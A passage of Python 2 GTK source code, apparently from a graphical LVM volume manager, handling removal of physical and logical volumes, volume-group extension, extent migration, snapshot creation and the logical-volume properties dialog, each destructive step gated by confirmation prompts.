self.command_handler.remove_vg(vg.get_name())
except CommandError, e:
self.errorMessage(e.getMessage())
return False
else: #solo_pv is False, more than one PV...
retval = self.warningMessage(CONFIRM_PV_VG_REMOVE % (pv.get_path(),vg.get_name()))
if (retval == gtk.RESPONSE_NO):
return False
try:
self.command_handler.reduce_vg(vg.get_name(), pv.get_path())
except CommandError, e:
self.errorMessage(e.getMessage())
return False
else:
#Two cases here: if solo_pv, bail, else check for size needed
if solo_pv:
self.errorMessage(SOLO_PV_IN_VG % pv.get_path())
return False
else: #There are additional PVs. We need to check space
ext_total, ext_used, ext_free = vg.get_extent_total_used_free()
actual_free_exts = ext_free - free
if alloc <= actual_free_exts:
if self.command_handler.is_dm_mirror_loaded() == False:
self.errorMessage(NO_DM_MIRROR)
return False
retval = self.warningMessage(CONFIRM_PV_VG_REMOVE % (pv.get_path(),vg.get_name()))
if (retval == gtk.RESPONSE_NO):
return False
# remove unused from extent_list
for ext in extent_list[:]:
if ext.get_lv().is_used() == False:
extent_list.remove(ext)
dlg = self.migrate_exts_dlg(True, pv, extent_list)
if dlg == None:
return False
exts_structs = []
for ext in extent_list:
exts_structs.append(ext.get_start_size())
try:
self.command_handler.move_pv(pv.get_path(), exts_structs, dlg.get_data())
except CommandError, e:
self.errorMessage(e.getMessage())
return True
try:
self.command_handler.reduce_vg(vg.get_name(), pv.get_path())
except CommandError, e:
self.errorMessage(e.getMessage())
return True
else:
self.errorMessage(NOT_ENOUGH_SPACE_VG % (vg.get_name(),pv.get_path()))
return False
if reset_tree == True:
apply(self.reset_tree_model, [vg.get_name()])
return True
def on_lv_rm(self, button):
self.remove_lv()
def remove_lv(self, lv=None):
reset_tree = False
if lv == None:
reset_tree = True
selection = self.treeview.get_selection()
model, iter = selection.get_selected()
lv = model.get_value(iter, OBJ_COL)
if lv.has_snapshots():
snapshots = lv.get_snapshots()
if len(snapshots) == 1:
self.errorMessage(CANNOT_REMOVE_UNDER_SNAPSHOT % (lv.get_name(), snapshots[0].get_name()))
else:
snaps_str = snapshots[0].get_name()
for snap in snapshots[1:]:
snaps_str = snaps_str + ', ' + snap.get_name()
self.errorMessage(CANNOT_REMOVE_UNDER_SNAPSHOTS % (lv.get_name(), snaps_str))
return False
mountpoint = self.model_factory.getMountPoint(lv.get_path())
fs = Filesystem.get_fs(lv.get_path())
if fs.name == Filesystem.get_filesystems()[0].name:
fs = None
fstab_mountpoint = Fstab.get_mountpoint(lv.get_path())
# prompt for confirmation
message = None
if mountpoint == None:
if fs == None:
message = CONFIRM_LV_REMOVE % lv.get_name()
else:
message = CONFIRM_LV_REMOVE_FILESYSTEM % (lv.get_name(), fs.name, lv.get_name())
else:
message = CONFIRM_LV_REMOVE_MOUNTED % (lv.get_name(), mountpoint, lv.get_name())
retval = self.warningMessage(message)
if retval == gtk.RESPONSE_NO:
return False
# unmount and remove from fstab
if mountpoint != None:
try:
self.command_handler.unmount(mountpoint)
except CommandError, e:
self.errorMessage(e.getMessage())
return False
if fstab_mountpoint != None:
Fstab.remove(fstab_mountpoint)
# finally remove lv
try:
self.command_handler.remove_lv(lv.get_path())
except CommandError, e:
self.errorMessage(e.getMessage())
return False
if reset_tree:
apply(self.reset_tree_model, [lv.get_vg().get_name()])
return True
def on_rm_select_lvs(self, button):
if self.section_list == None:
return
#check if list > 0
lvs_to_remove = self.section_list[:]
if len(lvs_to_remove) == 0:
return
vg = lvs_to_remove[0].get_vg()
# check if all operations could be completed
for lv in lvs_to_remove:
if lv.has_snapshots():
for snap in lv.get_snapshots():
if snap not in lvs_to_remove:
self.errorMessage(UNABLE_TO_PROCESS_REQUEST + '\n' + _("Logical Volume \"%s\" has snapshots that are not selected for removal. They must be removed as well.") % lv.get_name())
return
# remove snapshots first
reload_lvm = False
reset_tree_model = False
for lv in lvs_to_remove[:]:
if lv.is_snapshot():
lvs_to_remove.remove(lv)
if self.remove_lv(lv):
# success
reload_lvm = True
else:
# remove_lv failure
origin = lv.get_snapshot_info()[0]
if origin in lvs_to_remove:
msg = _("\"%s\", an origin of snapshot \"%s\", has been deleted from removal list.")
msg = msg % (origin.get_name(), lv.get_name())
self.simpleInfoMessage(msg)
lvs_to_remove.remove(origin)
if reload_lvm:
self.model_factory.reload()
vg = self.model_factory.get_VG(vg.get_name())
reset_tree_model = True
# remove other lvs
for lv in lvs_to_remove:
if self.remove_lv(vg.get_lvs()[lv.get_name()]):
reset_tree_model = True
if reset_tree_model:
self.clear_highlighted_sections()
apply(self.reset_tree_model, [vg.get_name()])
def on_rm_select_pvs(self, button):
if self.section_list == None:
return
#need to check if list > 0
if len(self.section_list) == 0:
return
# check if all operations could be completed
for pv in self.section_list:
for extent in pv.get_extent_blocks():
extents_lv = extent.get_lv()
if extents_lv.is_used():
error_message = None
if extents_lv.is_mirror_log or extents_lv.is_mirror_image:
error_message = _("Physical Volume \"%s\" contains extents belonging to a mirror. Mirrors are not migratable, so %s is not removable.")
error_message = error_message % (pv.get_path(), pv.get_path())
elif extents_lv.is_snapshot() or extents_lv.has_snapshots():
error_message = _("Physical Volume \"%s\" contains extents belonging to a snapshot or a snapshot's origin. Snapshots are not migratable, so %s is not removable.")
error_message = error_message % (pv.get_path(), pv.get_path())
if error_message != None:
self.errorMessage(UNABLE_TO_PROCESS_REQUEST + '\n' + error_message)
return
# do the job
reset_tree_model = False
for pv in self.section_list:
pvpath = pv.get_path()
vgname = pv.get_vg().get_name()
pv_to_remove = self.model_factory.get_VG(vgname).get_pvs()[pvpath]
if self.remove_pv(pv_to_remove):
# remove_pv migrates extents -> need to reload lvm data
self.model_factory.reload()
reset_tree_model = True
selection = self.treeview.get_selection()
model,iter = selection.get_selected()
vg = model.get_value(iter, OBJ_COL)
if reset_tree_model:
self.clear_highlighted_sections()
apply(self.reset_tree_model, [vg.get_name()])
def on_new_lv(self, button):
main_selection = self.treeview.get_selection()
main_model, main_iter = main_selection.get_selected()
main_path = main_model.get_path(main_iter)
vg = main_model.get_value(main_iter, OBJ_COL)
if len(vg.get_lvs().values()) == vg.get_max_lvs():
self.errorMessage(EXCEEDED_MAX_LVS)
return
total_exts, used_exts, free_exts = vg.get_extent_total_used_free()
if free_exts == 0:
self.errorMessage(NOT_ENOUGH_SPACE_FOR_NEW_LV % vg.get_name())
return
dlg = LV_edit_props(None, vg, self.model_factory, self.command_handler)
if dlg.run() == False:
return
apply(self.reset_tree_model,[vg.get_name()])
def on_init_entity(self, button):
selection = self.treeview.get_selection()
model,iter = selection.get_selected()
pv = model.get_value(iter, OBJ_COL)
if self.initialize_entity(pv) == None:
return
apply(self.reset_tree_model, ['', '', pv.get_path()])
def on_init_entity_from_menu(self, obj, dlg=None):
if dlg == None:
dlg = self.glade_xml.get_widget("init_block_device_dlg")
label = self.glade_xml.get_widget("init_block_device_dlg_path")
label.select_region(0, (-1))
label.grab_focus()
rc = dlg.run()
dlg.hide()
if rc == gtk.RESPONSE_APPLY:
path = label.get_text().strip()
target = follow_links_to_target(path)
if target == None:
self.errorMessage(_("The path you specified does not exist."))
self.on_init_entity_from_menu(None, dlg)
return
else:
o = execWithCapture('/bin/ls', ['/bin/ls', '-l', target])
output = o.strip()
if output[0] != 'b':
self.errorMessage(_("The path you specified is not a Block Device."))
self.on_init_entity_from_menu(None, dlg)
return
pv = PhysicalVolume.PhysicalVolume(path, None, None, 0, 0, False, 0, 0)
pv.set_path(path)
self.glade_xml.get_widget("init_block_device_dlg_path").set_text('')
if self.initialize_entity(pv) == None:
self.glade_xml.get_widget("init_block_device_dlg_path").set_text(path)
self.on_init_entity_from_menu(None, dlg)
else:
apply(self.reset_tree_model, ['', '', pv.get_path()])
else:
self.glade_xml.get_widget("init_block_device_dlg_path").set_text('')
def initialize_entity(self, pv):
path = pv.get_path()
mountPoint = self.model_factory.getMountPoint(path)
doFormat = False
message = ''
if mountPoint == None:
fs = Filesystem.get_fs(path)
if fs.name == Filesystem.get_filesystems()[0].name:
fs = None
if fs == None:
if pv.needsFormat():
if pv.wholeDevice():
message = INIT_ENTITY % path
else:
# disabled until fdisk_wrapper gets into reliable shape
# doFormat = True
# message = INIT_ENTITY_FREE_SPACE % (pv.get_volume_size_string(), path)
return None
else:
message = INIT_ENTITY % path
else:
message = INIT_ENTITY_FILESYSTEM % (path, fs.name, path)
else:
message = INIT_ENTITY_MOUNTED % (path, mountPoint, path)
rc = self.warningMessage(message)
if (rc == gtk.RESPONSE_NO):
return None
if mountPoint != None:
try:
self.command_handler.unmount(mountPoint)
except CommandError, e:
self.errorMessage(e.getMessage())
return None
if pv.needsFormat() and pv.wholeDevice():
dialog = self.glade_xml.get_widget('whole_device_format_choice')
label = self.glade_xml.get_widget('whole_device_format_choice_label')
label.set_text(INIT_ENTITY_DEVICE_CHOICE % path)
rc = dialog.run()
dialog.hide()
if rc == gtk.RESPONSE_YES:
doFormat = True
elif rc == gtk.RESPONSE_NO:
doFormat = False
else:
return None
try:
if doFormat:
# format
devpath = path
path = self.model_factory.partition_UV(pv)
# tell kernel to reread new partition table
if self.command_handler.reread_partition_table(devpath) == False:
message = RESTART_COMPUTER % pv.getDevnames()[0]
self.errorMessage(message)
self.errorMessage(_("Initialization of %s failed") % pv.getDevnames()[0])
return None
self.command_handler.initialize_entity(path)
except CommandError, e:
self.errorMessage(e.getMessage())
return None
return path
def on_add_pv_to_vg(self, button):
model = self.add_pv_to_vg_treeview.get_model()
if model != None:
model.clear()
vg_list = self.model_factory.get_VGs()
if len(vg_list) > 0:
for vg in vg_list:
iter = model.append()
model.set(iter,
NAME_COL, vg.get_name(),
SIZE_COL, vg.get_size_total_used_free_string()[0])
selection = self.treeview.get_selection()
main_model, iter_val = selection.get_selected()
pv = main_model.get_value(iter_val, OBJ_COL)
label_string = ADD_PV_TO_VG_LABEL % pv.get_path()
self.add_pv_to_vg_label.set_text(label_string)
self.add_pv_to_vg_treeview.set_model(model)
self.add_pv_to_vg_dlg.show()
def add_pv_to_vg_delete_event(self, *args):
self.add_pv_to_vg_dlg.hide()
return True
def on_ok_add_pv_to_vg(self, button):
selection = self.treeview.get_selection()
main_model, iter_val = selection.get_selected()
pv = main_model.get_value(iter_val, OBJ_COL)
selection = self.add_pv_to_vg_treeview.get_selection()
model, iter = selection.get_selected()
vgname = model.get_value(iter, NAME_COL)
vg = self.model_factory.get_VG(vgname)
#Check if this VG allows an Additional PV
if vg.get_max_pvs() == len(vg.get_pvs().values()):
self.errorMessage(EXCEEDED_MAX_PVS)
self.add_pv_to_vg_dlg.hide()
return
try:
self.command_handler.add_unalloc_to_vg(pv.get_path(), vgname)
except CommandError, e:
self.errorMessage(e.getMessage())
return
args = list()
args.append(pv.get_path())
apply(self.reset_tree_model, [vg.get_name()])
self.add_pv_to_vg_dlg.hide()
def on_cancel_add_pv_to_vg(self,button):
self.add_pv_to_vg_dlg.hide()
def setup_extend_vg_form(self):
self.on_extend_vg_button = self.glade_xml.get_widget('on_extend_vg_button')
self.on_extend_vg_button.connect("clicked",self.on_extend_vg)
self.extend_vg_form = self.glade_xml.get_widget('extend_vg_form')
self.extend_vg_form.connect("delete_event",self.extend_vg_delete_event)
self.extend_vg_tree = self.glade_xml.get_widget('extend_vg_tree')
self.extend_vg_label = self.glade_xml.get_widget('extend_vg_label')
self.glade_xml.get_widget('on_ok_extend_vg').connect('clicked', self.on_ok_extend_vg)
self.glade_xml.get_widget('on_cancel_extend_vg').connect('clicked',self.on_cancel_extend_vg)
#set up columns for tree
model = gtk.ListStore (gobject.TYPE_STRING,
gobject.TYPE_STRING,
gobject.TYPE_STRING,
gobject.TYPE_INT,
gobject.TYPE_PYOBJECT)
self.extend_vg_tree.set_model(model)
renderer1 = gtk.CellRendererText()
column1 = gtk.TreeViewColumn(ENTITY_NAME,renderer1, text=0)
self.extend_vg_tree.append_column(column1)
renderer2 = gtk.CellRendererText()
column2 = gtk.TreeViewColumn(ENTITY_SIZE,renderer2, text=1)
self.extend_vg_tree.append_column(column2)
renderer3 = gtk.CellRendererText()
column3 = gtk.TreeViewColumn(ENTITY_TYPE,renderer3, markup=2)
self.extend_vg_tree.append_column(column3)
# set up multiselection
self.extend_vg_tree.get_selection().set_mode(gtk.SELECTION_MULTIPLE)
def on_extend_vg(self, button):
main_selection = self.treeview.get_selection()
main_model,main_iter = main_selection.get_selected()
main_path = main_model.get_path(main_iter)
vg = main_model.get_value(main_iter, OBJ_COL)
if vg.get_max_pvs() == len(vg.get_pvs().values()):
self.errorMessage(EXCEEDED_MAX_PVS)
return
self.rebuild_extend_vg_tree()
self.extend_vg_form.show()
def on_ok_extend_vg(self, button):
selection = self.extend_vg_tree.get_selection()
if selection == None:
self.extend_vg_form.hide() #cancel opp if OK clicked w/o selection
#Now get name of VG to be extended...
main_selection = self.treeview.get_selection()
main_model,main_iter = main_selection.get_selected()
main_path = main_model.get_path(main_iter)
vg = main_model.get_value(main_iter, OBJ_COL)
# handle selections
model, treepathlist = selection.get_selected_rows()
# check if pvs can be added to vg
max_addable_pvs = vg.get_max_pvs() - len(vg.get_pvs().values())
if max_addable_pvs < len(treepathlist):
self.errorMessage(EXCEEDING_MAX_PVS % max_addable_pvs)
return
reset_tree_model = False
for treepath in treepathlist:
iter = model.get_iter(treepath)
entity_path = model.get_value(iter, NAME_COL)
entity_type = model.get_value(iter, VOL_TYPE_COL)
if entity_type == UNINIT_VOL: #First, initialize if necessary
entity = model.get_value(iter, OBJ_COL)
entity_path = self.initialize_entity(entity)
if entity_path == None:
continue
try:
self.command_handler.add_unalloc_to_vg(entity_path, vg.get_name())
except CommandError, e:
self.errorMessage(e.getMessage())
continue
reset_tree_model = True
self.extend_vg_form.hide()
if reset_tree_model:
apply(self.reset_tree_model, [vg.get_name()])
def on_cancel_extend_vg(self, button):
self.extend_vg_form.hide()
def extend_vg_delete_event(self, *args):
self.extend_vg_form.hide()
return True
def rebuild_extend_vg_tree(self):
uv_string = "<span foreground=\"#ED1C2A\"><b>" + UNALLOCATED_PV + "</b></span>"
iv_string = "<span foreground=\"#BBBBBB\"><b>" + UNINIT_DE + "</b></span>"
model = self.extend_vg_tree.get_model()
if model != None:
model.clear()
unallocated_vols = self.model_factory.query_unallocated()
for vol in unallocated_vols:
iter = model.append()
model.set(iter,
NAME_COL, vol.get_path(),
SIZE_COL, vol.get_size_total_string(),
PATH_COL, uv_string,
VOL_TYPE_COL, UNALLOC_VOL,
OBJ_COL, vol)
uninitialized_list = self.model_factory.query_uninitialized()
for item in uninitialized_list:
if item.initializable:
iter = model.append()
model.set(iter,
NAME_COL, item.get_path(),
SIZE_COL, item.get_size_total_string(),
PATH_COL, iv_string,
VOL_TYPE_COL,UNINIT_VOL,
OBJ_COL, item)
selection = self.treeview.get_selection()
main_model, iter_val = selection.get_selected()
vg = main_model.get_value(iter_val, OBJ_COL)
self.extend_vg_label.set_text(ADD_VG_LABEL % vg.get_name())
def new_vg_delete_event(self, *args):
self.new_vg_dlg.hide()
return True
def setup_misc_widgets(self):
self.remove_unalloc_pv = self.glade_xml.get_widget('remove_unalloc_pv')
self.remove_unalloc_pv.connect("clicked",self.on_remove_unalloc_pv)
self.on_pv_rm_button = self.glade_xml.get_widget('on_pv_rm_button')
self.on_pv_rm_button.connect("clicked",self.on_pv_rm)
self.on_lv_rm_button = self.glade_xml.get_widget('on_lv_rm_button')
self.on_lv_rm_button.connect("clicked",self.on_lv_rm)
self.on_rm_select_lvs_button = self.glade_xml.get_widget('on_rm_select_lvs')
self.on_rm_select_lvs_button.connect("clicked",self.on_rm_select_lvs)
self.on_rm_select_pvs_button = self.glade_xml.get_widget('on_rm_select_pvs')
self.on_rm_select_pvs_button.connect("clicked",self.on_rm_select_pvs)
self.migrate_exts_button = self.glade_xml.get_widget('button27')
self.migrate_exts_button.connect("clicked",self.on_migrate_exts)
self.edit_lv_button = self.glade_xml.get_widget('button35')
self.edit_lv_button.connect("clicked",self.on_edit_lv)
self.create_snapshot_button = self.glade_xml.get_widget('create_snapshot_button')
self.create_snapshot_button.connect("clicked",self.on_create_snapshot)
# misc events
self.glade_xml.get_widget("initialize_block_device1").connect('activate', self.on_init_entity_from_menu)
def on_remove_unalloc_pv(self, button):
selection = self.treeview.get_selection()
model, iter = selection.get_selected()
pv = model.get_value(iter, OBJ_COL)
retval = self.warningMessage(CONFIRM_PVREMOVE % pv.get_path())
if (retval == gtk.RESPONSE_NO):
return
else:
try:
self.command_handler.remove_pv(pv.get_path())
except CommandError, e:
self.errorMessage(e.getMessage())
return
apply(self.reset_tree_model, ['', '', pv.get_path()])
def on_migrate_exts(self, button):
selection = self.treeview.get_selection()
model, iter = selection.get_selected()
pv = model.get_value(iter, OBJ_COL)
# get selected extents
if self.section_list == None:
self.simpleInfoMessage(_("Please select some extents first"))
return
if len(self.section_list) == 0:
self.simpleInfoMessage(_("Please select some extents first"))
return
extents_from = self.section_list[:]
# dialog
dlg = self.migrate_exts_dlg(False, pv, extents_from)
if dlg == None:
return
exts_from_structs = []
for ext in extents_from:
exts_from_structs.append(ext.get_start_size())
try:
self.command_handler.move_pv(pv.get_path(), exts_from_structs, dlg.get_data())
except CommandError, e:
self.errorMessage(e.getMessage())
apply(self.reset_tree_model, [pv.get_vg().get_name()])
return
# removal - whether this is a migration or a removal operation
def migrate_exts_dlg(self, removal, pv, exts):
vg = pv.get_vg()
needed_extents = 0
for ext in exts:
needed_extents = needed_extents + ext.get_start_size()[1]
free_extents = 0
pvs = []
for p in vg.get_pvs().values():
if pv != p:
p_free_exts = p.get_extent_total_used_free()[2]
if p_free_exts >= needed_extents:
pvs.append(p)
free_extents = free_extents + p_free_exts
if needed_extents > free_extents:
self.errorMessage(_("There are not enough free extents to perform the necessary migration. Adding more physical volumes would solve the problem."))
return None
lvs = {}
for ext in exts:
lv = ext.get_lv()
lvs[lv] = lv
dlg = MigrateDialog(not removal, pvs, lvs.values())
if not dlg.run():
return None
return dlg
def on_edit_lv(self, button):
selection = self.treeview.get_selection()
model, iter = selection.get_selected()
lv = model.get_value(iter, OBJ_COL)
vg = lv.get_vg()
dlg = LV_edit_props(lv, vg, self.model_factory, self.command_handler)
if dlg.run() == False:
return
apply(self.reset_tree_model, [vg.get_name()])
def on_create_snapshot(self, button):
selection = self.treeview.get_selection()
model, iter = selection.get_selected()
lv = model.get_value(iter, OBJ_COL)
vg = lv.get_vg()
if vg.get_max_lvs() == len(vg.get_lvs().values()):
self.errorMessage(EXCEEDED_MAX_LVS)
return
# checks
if lv.is_snapshot():
self.errorMessage(ALREADY_A_SNAPSHOT)
return
if lv.is_mirrored():
self.errorMessage(CANNOT_SNAPSHOT_A_MIRROR)
return
t_exts, u_exts, f_exts = vg.get_extent_total_used_free()
if f_exts == 0:
self.errorMessage(NOT_ENOUGH_SPACE_FOR_NEW_LV % vg.get_name())
return
if self.command_handler.is_dm_snapshot_loaded() == False:
self.errorMessage(NO_DM_SNAPSHOT)
return
dlg = LV_edit_props(lv, vg, self.model_factory, self.command_handler, True)
if dlg.run() == False:
return
apply(self.reset_tree_model, [vg.get_name()])
#######################################################
###Convenience Dialogs
def warningMessage(self, message):
dlg = gtk.MessageDialog(None, 0,
gtk.MESSAGE_WARNING,
gtk.BUTTONS_YES_NO,
message)
dlg.show_all()
rc = dlg.run()
dlg.destroy()
if (rc == gtk.RESPONSE_NO):
return gtk.RESPONSE_NO
elif (rc == gtk.RESPONSE_DELETE_EVENT):
return gtk.RESPONSE_NO
elif (rc == gtk.RESPONSE_CLOSE):
return gtk.RESPONSE_NO
elif (rc == gtk.RESPONSE_CANCEL):
return gtk.RESPONSE_NO
else:
return rc
def errorMessage(self, message):
dlg = gtk.MessageDialog(None, 0,
gtk.MESSAGE_ERROR,
gtk.BUTTONS_OK,
message)
dlg.show_all()
rc = dlg.run()
dlg.destroy()
return rc
def infoMessage(self, message):
dlg = gtk.MessageDialog(None, 0,
gtk.MESSAGE_INFO,
gtk.BUTTONS_OK,
message)
dlg.show_all()
rc = dlg.run()
dlg.destroy()
return rc
def simpleInfoMessage(self, message):
dlg = gtk.MessageDialog(None, 0,
gtk.MESSAGE_INFO,
gtk.BUTTONS_OK,
message)
dlg.show_all()
rc = dlg.run()
dlg.destroy()
if (rc == gtk.RESPONSE_NO):
return gtk.RESPONSE_NO
elif (rc == gtk.RESPONSE_DELETE_EVENT):
return gtk.RESPONSE_NO
elif (rc == gtk.RESPONSE_CLOSE):
return gtk.RESPONSE_NO
elif (rc == gtk.RESPONSE_CANCEL):
return gtk.RESPONSE_NO
else:
return rc
def register_highlighted_sections(self, section_type, section_list):
self.section_type = section_type
self.section_list = section_list
def clear_highlighted_sections(self):
self.section_type = UNSELECTABLE_TYPE
self.section_list = None
class MigrateDialog:
def __init__(self, migrate, pvs, lvs):
gladepath = 'migrate_extents.glade'
if not os.path.exists(gladepath):
gladepath = "%s/%s" % (INSTALLDIR, gladepath)
gtk.glade.bindtextdomain(PROGNAME)
self.glade_xml = gtk.glade.XML (gladepath, domain=PROGNAME)
# fill out lv selection combobox
self.lv_combo = gtk.combo_box_new_text()
self.glade_xml.get_widget('lv_selection_container').pack_end(self.lv_combo)
self.lv_combo.show()
self.lv_combo.set_sensitive(False)
for lv in lvs:
self.lv_combo.append_text(lv.get_name())
model = self.lv_combo.get_model()
iter = model.get_iter_first()
self.lv_combo.set_active_iter(iter)
# fill out pv selection combobox
pv_selection_container = self.glade_xml.get_widget('pv_selection_container')
self.pv_combo = gtk.combo_box_new_text()
pv_selection_container.pack_end(self.pv_combo)
self.pv_combo.show()
self.pv_combo.set_sensitive(False)
if len(pvs) != 0:
for p in pvs:
self.pv_combo.append_text(p.get_path())
model = self.pv_combo.get_model()
iter = model.get_iter_first()
self.pv_combo.set_active_iter(iter)
else:
pv_selection_container.hide()
self.dlg = self.glade_xml.get_widget('dialog1')
msg_label = self.glade_xml.get_widget('msg_label')
self.dlg.set_title(_("Migrate extents"))
if migrate:
msg_label.hide()
else:
# remove
self.glade_xml.get_widget('lv_selection_container').hide()
# events
self.glade_xml.get_widget('choose_pv_radio').connect('clicked', self.on_choose_pv_radio)
self.glade_xml.get_widget('choose_lv_check').connect('clicked', self.on_choose_lv_check)
def on_choose_pv_radio(self, obj1):
if self.glade_xml.get_widget('choose_pv_radio').get_active():
self.pv_combo.set_sensitive(True)
else:
self.pv_combo.set_sensitive(False)
def on_choose_lv_check(self, obj1):
if self.glade_xml.get_widget('choose_lv_check').get_active():
self.lv_combo.set_sensitive(True)
else:
self.lv_combo.set_sensitive(False)
def run(self):
rc = self.dlg.run()
self.dlg.hide()
return rc == gtk.RESPONSE_OK
# return [pv to migrate to, policy (0 - inherit, 1 - normal, 2 - contiguous, 3 - anywhere), lv to migrate from]
def get_data(self):
ret = []
# migrate extents to
if self.glade_xml.get_widget('choose_pv_radio').get_active() == True:
iter = self.pv_combo.get_active_iter()
ret.append(self.pv_combo.get_model().get_value(iter, 0))
else:
ret.append(None)
if self.glade_xml.get_widget('radiobutton4').get_active():
ret.append(0)
elif self.glade_xml.get_widget('radiobutton5').get_active():
ret.append(1)
elif self.glade_xml.get_widget('radiobutton6').get_active():
ret.append(2)
else:
ret.append(3)
# lv to migrate from
if self.glade_xml.get_widget('choose_lv_check').get_active():
iter = self.lv_combo.get_active_iter()
ret.append(self.lv_combo.get_model().get_value(iter, 0))
else:
ret.append(None)
return ret
class LV_edit_props:
# set lv to None if new lv is to be created
def __init__(self, lv, vg, model_factory, command_handler, snapshot=False):
self.snapshot = snapshot
if lv == None:
self.new = True
self.snapshot = False
else:
if self.snapshot:
self.new = True
else:
self.new = False
self.lv = lv
self.vg = vg
self.model_factory = model_factory
self.command_handler = command_handler
# available filesystems
self.filesystems = dict()
fss = Filesystem.get_filesystems()
self.fs_none = fss[0]
for fs in fss:
self.filesystems[fs.name] = fs
if self.new:
if self.snapshot:
self.fs = Filesystem.get_fs(self.lv.get_path())
self.filesystems[self.fs.name] = self.fs
else:
self.fs = self.fs_none
self.mount_point = ''
self.mount = False
self.mount_at_reboot = False
else:
self.fs = Filesystem.get_fs(lv.get_path())
if self.fs.name == self.fs_none.name:
self.fs = self.fs_none
else:
self.filesystems.pop(self.fs_none.name)
self.filesystems[self.fs.name] = self.fs
self.mount_point = self.model_factory.getMountPoint(lv.get_path())
self.mountpoint_at_reboot = Fstab.get_mountpoint(lv.get_path().strip())
if self.mount_point == None:
if self.mountpoint_at_reboot == None:
self.mount_point = ''
else:
self.mount_point = self.mountpoint_at_reboot
self.mount = False
else:
self.mount = True
self.mount_at_reboot = (self.mountpoint_at_reboot != None)
for fs_name in self.filesystems:
self.filesystems[fs_name].set_clustered(vg.clustered())
gladepath = 'lv_edit_props.glade'
if not os.path.exists(gladepath):
gladepath = "%s/%s" % (INSTALLDIR, gladepath)
gtk.glade.bindtextdomain(PROGNAME)
self.glade_xml = gtk.glade.XML (gladepath, domain=PROGNAME)
self.dlg = self.glade_xml.get_widget('dialog1')
self.size_units_combo = gtk.combo_box_new_text()
self.glade_xml.get_widget('size_units_container').pack_end(self.size_units_combo)
self.size_units_combo.show()
self.filesys_combo = gtk.combo_box_new_text()
self.glade_xml.get_widget('filesys_container').pack_start(self.filesys_combo)
self.filesys_combo.show()
self.fs_config_button = gtk.Button(_("Options"))
self.glade_xml.get_widget('filesys_container').pack_end(self.fs_config_button)
#self.fs_config_button.show()
self.fs_config_button.hide()
def run(self):
need_reload = False
self.setup_dlg()
while True:
rc = self.dlg.run()
if rc == gtk.RESPONSE_REJECT:
self.setup_dlg()
continue
elif rc == gtk.RESPONSE_OK:
try:
if self.apply() == True:
need_reload = True
break
except CommandError, e:
self.errorMessage(e.getMessage())
need_reload = True
break
else:
break
self.dlg.hide()
return need_reload
def setup_dlg(self):
# title
if self.new:
if self.snapshot:
self.dlg.set_title(_("Create A Snapshot of %s") % self.lv.get_name())
else:
self.dlg.set_title(_("Create New Logical Volume"))
else:
if self.lv.is_snapshot():
message = _("Edit %s, a Snapshot of %s")
self.dlg.set_title(message % (self.lv.get_name(), self.lv.get_snapshot_info()[0].get_name()))
else:
self.dlg.set_title(_("Edit Logical Volume"))
# lv name
self.name_entry = self.glade_xml.get_widget('lv_name')
if self.new:
self.name_entry.set_text('')
else:
self.name_entry.set_text(self.lv.get_name())
# revert button
if self.new:
self.glade_xml.get_widget('revert_button').hide()
else:
self.glade_xml.get_widget('revert_button').show()
# lv properties
# TODO: use ACCEPTABLE_STRIPE_SIZES
stripe_size_combo = self.glade_xml.get_widget('stripe_size')
model = stripe_size_combo.get_model()
iter = model.get_iter_first()
stripe_size_combo.set_active_iter(iter)
if self.new:
if self.snapshot:
self.glade_xml.get_widget('lv_properties_frame').hide()
else:
self.glade_xml.get_widget('stripes_container').set_sensitive(False)
stripe_size_combo = self.glade_xml.get_widget('stripe_size')
model = stripe_size_combo.get_model()
iter = model.get_iter_first()
stripe_size_combo.set_active_iter(iter)
max_stripes = len(self.vg.get_pvs())
if max_stripes > 8:
max_stripes = 8
self.glade_xml.get_widget('stripes_num').set_range(2, max_stripes)
self.glade_xml.get_widget('stripes_num').set_update_policy(gtk.UPDATE_IF_VALID)
else:
if self.lv.is_snapshot():
self.glade_xml.get_widget('lv_properties_frame').hide()
else:
self.glade_xml.get_widget('linear').hide()
self.glade_xml.get_widget('striped').hide()
self.glade_xml.get_widget('stripes_container').hide()
# filesystem
self.glade_xml.get_widget('filesys_container').remove(self.filesys_combo)
self.filesys_combo = gtk.combo_box_new_text()
self.glade_xml.get_widget('filesys_container').pack_start(self.filesys_combo)
self.filesys_combo.show()
self.filesys_combo.append_text(self.fs.name)
for filesys in self.filesystems:
if (self.fs.name != filesys) and self.filesystems[filesys].creatable:
self.filesys_combo.append_text(filesys)
model = self.filesys_combo.get_model()
iter = model.get_iter_first()
self.filesys_combo.set_active_iter(iter)
self.filesys_show_hide()
if self.snapshot:
self.glade_xml.get_widget('filesys_container').set_sensitive(False)
elif not self.new:
if self.lv.is_snapshot():
self.glade_xml.get_widget('filesys_container').set_sensitive(False)
self.mountpoint_entry = self.glade_xml.get_widget('mount_point')
if self.new:
self.mountpoint_entry.set_text('')
else:
self.mountpoint_entry.set_text(self.mount_point)
self.glade_xml.get_widget('mount').set_active(self.mount)
self.glade_xml.get_widget('mount_at_reboot').set_active(self.mount_at_reboot)
self.on_mount_changed(None)
# size
self.size_scale = self.glade_xml.get_widget('size_scale')
self.size_entry = self.glade_xml.get_widget('size_entry')
self.glade_xml.get_widget('size_units_container').remove(self.size_units_combo)
self.size_units_combo = gtk.combo_box_new_text()
self.glade_xml.get_widget('size_units_container').pack_end(self.size_units_combo)
self.size_units_combo.show()
for unit in [EXTENTS, GIGABYTES, MEGABYTES, KILOBYTES]:
self.size_units_combo.append_text(unit)
model = self.size_units_combo.get_model()
iter = model.get_iter_first()
self.size_units_combo.set_active_iter(iter)
# in extents
self.extent_size = self.vg.get_extent_size()
self.size_lower = 1
if self.new:
self.size = 0
else:
self.size = self.lv.get_extent_total_used_free()[0]
self.size_upper = self.vg.get_extent_total_used_free()[2] + self.size
self.set_size_new(self.size)
self.update_size_limits()
self.change_size_units()
# mirroring
if self.new:
self.mirror_to_diff_hds = None # prompt for option
self.glade_xml.get_widget('enable_mirroring').set_active(False)
else:
already_mirrored = self.lv.is_mirrored()
if already_mirrored:
self.mirror_to_diff_hds = False # mirror not resizable => don't care for now
else:
self.mirror_to_diff_hds = None # prompt for option
self.glade_xml.get_widget('enable_mirroring').set_active(already_mirrored)
self.mirror_to_diff_hds = False
if MIRRORING_UI_SUPPORT == False:
if self.new:
self.glade_xml.get_widget('enable_mirroring').hide()
else:
self.glade_xml.get_widget('lv_properties_frame').hide()
# set up mirror limits
self.on_enable_mirroring(None)
# events
self.fs_config_button.connect('clicked', self.on_fs_config)
self.filesys_combo.connect('changed', self.on_fs_change)
